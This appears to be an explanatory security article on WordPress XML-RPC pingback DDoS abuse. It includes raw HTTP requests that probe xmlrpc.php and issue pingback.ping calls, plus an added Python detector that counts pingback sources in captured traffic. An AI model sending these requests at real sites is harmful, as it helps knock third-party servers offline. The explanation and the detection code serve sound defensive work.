Distributed Denial of Service (DDoS) is one of the most lethal cyber-attacks: it can paralyze a server by hitting it with hundreds and thousands of concurrent requests. Hackers use the pingback feature of WordPress, exposed through the xmlrpc.php file, to execute such attacks.

Ideally, the hacker targets an endpoint or page that can be hit several times and takes longer to respond. This way a single hit has the maximum impact on server resources, and in our case XML-RPC serves the hacker well by exposing such endpoints.

Several already compromised WordPress sites are used to execute the pingback.ping method against a single victim. The overwhelming volume of HTTP GET and POST requests jams the regular traffic and eventually crashes the server.

First, the hacker checks if the xmlrpc.php file is enabled or not by sending the following request.

POST /xmlrpc.php HTTP/1.1
Host: withinsecurity.com
Connection: keep-alive
Content-Length: 175

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>demo.sayHello</methodName>
<params>
<param>
<value>admin</value>
</param>
</params>
</methodCall>

Once it is confirmed that XML-RPC is enabled on the target website, the attacker starts hitting it, using the network of exploited sites to send multiple pingback requests to a victim site. This can be automated from multiple hosts and used to cause a mass DDoS attack on the victim site.

POST /xmlrpc.php HTTP/1.1
Host: withinsecurity.com
Connection: keep-alive
Content-Length: 293

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://173.244.58.36/</string></value>
</param>
<param>
<value><string>https://example.com/blog/how-to-make-a-salad</string></value>
</param>
</params>
</methodCall>
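
From the defender's side, both request bodies above are easy to recognize in captured POST traffic to xmlrpc.php. The Python code below is an added example, not part of the original article: it parses XML-RPC bodies, rejects oversized or DTD-bearing input before parsing, and counts pingback.ping calls per source URL. The function names, the 8192-byte limit, the threshold of 3 and the sample bodies are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import Counter

MAX_BODY = 8192  # assumption: a legitimate pingback call is far smaller than this

def parse_xmlrpc_call(body):
    """Return (method_name, [param strings]), or None if the body is rejected."""
    # Reject oversized bodies and any DTD before parsing untrusted XML.
    if len(body) > MAX_BODY or "<!DOCTYPE" in body or "<!ENTITY" in body:
        return None
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    params = []
    for value in root.findall("./params/param/value"):
        # XML-RPC allows <value><string>x</string></value> and bare <value>x</value>.
        text = value.findtext("string")
        params.append((text if text is not None else value.text or "").strip())
    return (root.findtext("methodName") or "").strip(), params

def pingback_summary(bodies, threshold=3):
    """Count pingback.ping calls per source URL (first parameter, sourceURI)."""
    per_source, rejected = Counter(), 0
    for body in bodies:
        call = parse_xmlrpc_call(body)
        if call is None:
            rejected += 1
        elif call[0] == "pingback.ping" and len(call[1]) == 2:
            per_source[call[1][0]] += 1
    flagged = sorted(s for s, n in per_source.items() if n >= threshold)
    return {"per_source": dict(per_source), "flagged": flagged, "rejected": rejected}

def sample_ping(source, target):
    """Constructed sample body in the shape of the second request above."""
    return ("<methodCall><methodName>pingback.ping</methodName><params>"
            f"<param><value><string>{source}</string></value></param>"
            f"<param><value><string>{target}</string></value></param>"
            "</params></methodCall>")

# Constructed sample data: three pings naming one source, a probe, and a DTD body.
SAMPLE_BODIES = [sample_ping("http://192.0.2.10/", f"https://example.com/post-{i}")
                 for i in range(3)] + [
    '<?xml version="1.0" encoding="utf-8"?><methodCall><methodName>demo.sayHello'
    "</methodName><params><param><value>admin</value></param></params></methodCall>",
    '<!DOCTYPE x [<!ENTITY a "b">]><methodCall><methodName>x</methodName></methodCall>',
]
```

Calling pingback_summary on one batch of bodies (for example, one minute of traffic) returns the per-source counts, the sources at or above the threshold, and the number of bodies rejected before parsing.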